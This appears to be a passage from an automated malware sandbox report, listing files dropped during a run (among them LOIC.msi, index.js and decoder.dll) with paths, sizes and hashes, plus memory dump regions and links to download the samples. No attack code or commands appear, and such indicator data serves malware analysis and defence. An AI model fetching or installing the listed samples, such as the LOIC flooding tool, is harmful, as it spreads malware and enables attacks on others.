f991cda750d4b57c847076f16bf267f1aee503cdacac3732fe0ea1ac685a6424722be61e184fe9c0006c0008387c723ea5ef5ca3a1e638dd47aa609549e8d3a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI75ED.tmp

Filesize
817KB

MD5
0b5e646a65d2861e0bce68bb0dc906e2

SHA1
f34461a7c9b3e0a9d7460757158c768e6e3e0c1f

SHA256
279415ca33496256bf8ce72ff656080586938ec4c298ab8a9ef5c707d6330d2c

SHA512
26c3dabcf67fbce97bcccbce4f75a775bbe481c21b908e6db1ae0adef0e16108bc773b56f52ab039f09ac52855b1b79f0844aa3caa4b94ebec530c73a023affb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5rjn2ki.jgq.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\shi7DDB.tmp

Filesize
2.7MB

MD5
ebec631150e28e8edeade557a1150fbd

SHA1
84da8f7380f63920351a1ac734b226e44007da66

SHA256
9e217bd4c7122882fe9ddb70809a251de285d79c5367894f1dadc625012fce46

SHA512
93bc6e318f5262d56c5690ab05c7e1c248a8ceae05d0e5946de6e81719243a4776cd1a9e56a5170b37e7eeb2fea3d8d4e797aada1fb44214572a54d754ee041f

Download Submit
C:\Users\Admin\AppData\Local\Temp\shi7DEB.tmp

Filesize
969KB

MD5
8daa0843654de0cc1d40325747ac9f3e

SHA1
0727d9e78a371b59499b2a0754956d4a1378b8a7

SHA256
d41f00ae17e1e1dbc56826584db3332a33d9b6f25462255404eb9ec37fec45e1

SHA512
8381386d9df7a619ab4d188ae45f4415587d55ad74b49d4ce7680d08a3f1702dd750b2ddbc2e03d507b29ef06541fea5d822a2c3968d857d13c2354793f2fa73

Download Submit
C:\Users\Admin\AppData\Roaming\F9753A3\LOIC.msi

Filesize
1.3MB

MD5
c93958327d2d0801e32780587fc4e8de

SHA1
f710a17bbc1c5fff729f585dc8319abd37d10a77

SHA256
ba30e9b8486128b57af2ba1b06eed6b13115905e94d79f837dd13d0fcbb5d80e

SHA512
611e3b92c9be557b9b53dedbff95c15796e1540efdc625ee4d40e120798fc27d73b8bc46d6cb917278dac6660109598d616d64eeb9c0f90c7f73d40de08e8b4a

Download Submit
C:\Users\Admin\AppData\Roaming\F9753A3\LOIC.msi

Filesize
2.6MB

MD5
ace834a84a3d7c617488a79de7c156e0

SHA1
24a3c7675aa95cb1081d7d89694d8288e6e87429

SHA256
e78a7ceba11ef5ece1f5d74c9a7ffc6a9927c58e2aac996cf18cc05bddbdc8f0

SHA512
577be9f4dc2361fd084c86dc2e03c8772c20f2c145fd87b0b2c6dbbfd4d17c66e457f1d4e9176b46f8fd36d93c6930e7abdcf6e25fc323264ee8771a1d8bb2a2

Download Submit
C:\Users\Admin\AppData\Roaming\F9753A3\index.js

Filesize
1.1MB

MD5
ebb2708ed093e9114d54eaffb37a28ab

SHA1
266ba3dc516525cd7d88eb03eaab323aa48206a5

SHA256
46f909b0d803daaf64c7714d78970dfa815f5c4a970602b3751f23a48c705158

SHA512
8c6d58ce8aaaa6eef919ab86932c95e9d04fe4c3952bddb0d84390ae97bd89f91782dfee29d83f12b157e75b85ba1bae4832a7b2e568d7ce97382c0c4a62d70c

Download Submit
C:\Windows\Installer\MSI7D51.tmp

Filesize
535KB

MD5
1b194025c161371d3bcb9b5919278620

SHA1
af9edebc182d96e361140670751dd2f7756d92ad

SHA256
7aec9b8db15c991f780cd3542b149fc1399118371ccd3bd14341a0c47bf63486

SHA512
22ae4a6c80b346d440911f51193c3d456b03db1a26df78d2e7a7f51f6aae52892867c4f03b5bc96a73d7372519f73a60f088c2100cf80a69540b865fe0bf924a

Download Submit
C:\Windows\Installer\MSI8054.tmp

Filesize
178KB

MD5
b87c1c4f36d6fb0a3ccecc6cf72d0bc9

SHA1
a32b1780af0392037911ca5d0b7e4caa454e0420

SHA256
b75c6be504a92f0d8af3a876a02fce82022899f6d09cc7ca0ade19620965b913

SHA512
ccff049e3846352aae7c291a1971c7708dcde01f70c3f161e5c5388b3a1847bc90669266c9f5eba742f4a302192c998a84221a9d51b0eb1de9327031bb26cb4c

Download Submit
C:\Windows\Installer\MSI82AB.tmp

Filesize
404KB

MD5
f49ad35868f72b3fb7b14424795b220d

SHA1
67b00730b931741cee9014606237a7d3f95577f5

SHA256
5031b53ae252e749dac9f2b0e0cd24d281298d9e8ebe02a36554642fda226ae0

SHA512
144b5d1b478f1f741c87395c6ee41bf61b11f3bf2b7cc4606bd71d8b03db340341fc2db989c02404cf4663c0c1039e681a3d0ac7a4ce42e3a56ba1a30d60b7df

Download Submit
\Users\Admin\AppData\Roaming\decoder.dll

Filesize
182KB

MD5
e1a7eedf1c29be164527c93b24f3e971

SHA1
0393ab9ccbb5f4ea16d2ab11dca0f733569f925f

SHA256
5c60676010275dca6fdc721876bfd067be5d945817bb663f9a7a05f9117f4833

SHA512
822a3e917dfcd0999d0d9514043aee0de0e40b163d3a644e424267d9b42b01bb1cf8c22243b5d8a5705a978dae87bd08a474e7a63573c0a56d824c4a1aaf3a58

Download Submit
\Windows\Installer\MSI7BF6.tmp

Filesize
278KB

MD5
8d47d65cffa4aba7364f1b0ae13afaf7

SHA1
f1a70cee0f34c2f89e669e4d30ab3077a111dd8c

SHA256
25be4de2442a9c50a0f88eec0d953ace453dc12c0efdc4249ab4c6afb5c9fe95

SHA512
eda697c66769c51ff86416b213c449e610bd6103e13561365b071f0f230609e2df81f0fd5a9023e06878a6f4620d18cbd6ef41e64b9421728f1072010b0dce50

Download Submit
\Windows\Installer\MSI7FD6.tmp

Filesize
141KB

MD5
b14d92c807c494bb17bab68ab962ef99

SHA1
1933465ab727b9db88b4d8a35052b10e0aeca4a9

SHA256
49bfc33e832a848e1320a671bd58999ba08a2b3f401317d40261ccdd89cc0fe8

SHA512
cdfef6173d1d975c2c8bf61b4ed1a618289a8f688988385745ee8fe3fecc6f078b5f4f219ceac28a13efeb5a47b8c2e305f57adbe543eb03643279bd529db1ef

Download Submit
memory/3628-159-0x0000000007700000-0x0000000007766000-memory.dmp

Filesize
408KB

Download
memory/3628-197-0x0000000008FB0000-0x0000000008FCA000-memory.dmp

Filesize
104KB

Download
memory/3628-156-0x00000000010D0000-0x00000000010E0000-memory.dmp

Filesize
64KB

Download
memory/3628-157-0x0000000006F50000-0x0000000007578000-memory.dmp

Filesize
6.2MB

Download
memory/3628-158-0x0000000007580000-0x00000000075A2000-memory.dmp

Filesize
136KB

Download
memory/3628-155-0x00000000010D0000-0x00000000010E0000-memory.dmp

Filesize
64KB

Download
memory/3628-160-0x0000000007870000-0x00000000078D6000-memory.dmp

Filesize
408KB

Download
memory/3628-161-0x0000000007920000-0x0000000007C70000-memory.dmp

Filesize
3.3MB

Download
memory/3628-162-0x0000000007CD0000-0x0000000007CEC000-memory.dmp

Filesize
112KB

Download
memory/3628-163-0x0000000007D40000-0x0000000007D8B000-memory.dmp

Filesize
300KB

Download
memory/3628-154-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download
memory/3628-182-0x0000000008180000-0x00000000081BC000-memory.dmp

Filesize
240KB

Download
memory/3628-191-0x0000000008EE0000-0x0000000008F56000-memory.dmp

Filesize
472KB

Download
memory/3628-153-0x0000000001070000-0x00000000010A6000-memory.dmp

Filesize
216KB

Download
memory/3628-196-0x0000000009240000-0x00000000092D4000-memory.dmp

Filesize
592KB

Download
memory/3628-198-0x0000000009000000-0x0000000009022000-memory.dmp

Filesize
136KB

Download
memory/3628-199-0x00000000097E0000-0x0000000009CDE000-memory.dmp

Filesize
5.0MB

Download
memory/3628-201-0x00000000093F0000-0x000000000948C000-memory.dmp

Filesize
624KB

Download
memory/3628-200-0x0000000006B20000-0x0000000006B2A000-memory.dmp

Filesize
40KB

Download
memory/3628-206-0x00000000010D0000-0x00000000010E0000-memory.dmp

Filesize
64KB

Download
memory/3628-211-0x000000000A3E0000-0x000000000AA58000-memory.dmp

Filesize
6.5MB

Download
memory/3628-228-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download
memory/3628-240-0x00000000010D0000-0x00000000010E0000-memory.dmp

Filesize
64KB

Download
memory/3628-251-0x00000000010D0000-0x00000000010E0000-memory.dmp

Filesize
64KB

Download
memory/3628-262-0x00000000010D0000-0x00000000010E0000-memory.dmp

Filesize
64KB

Download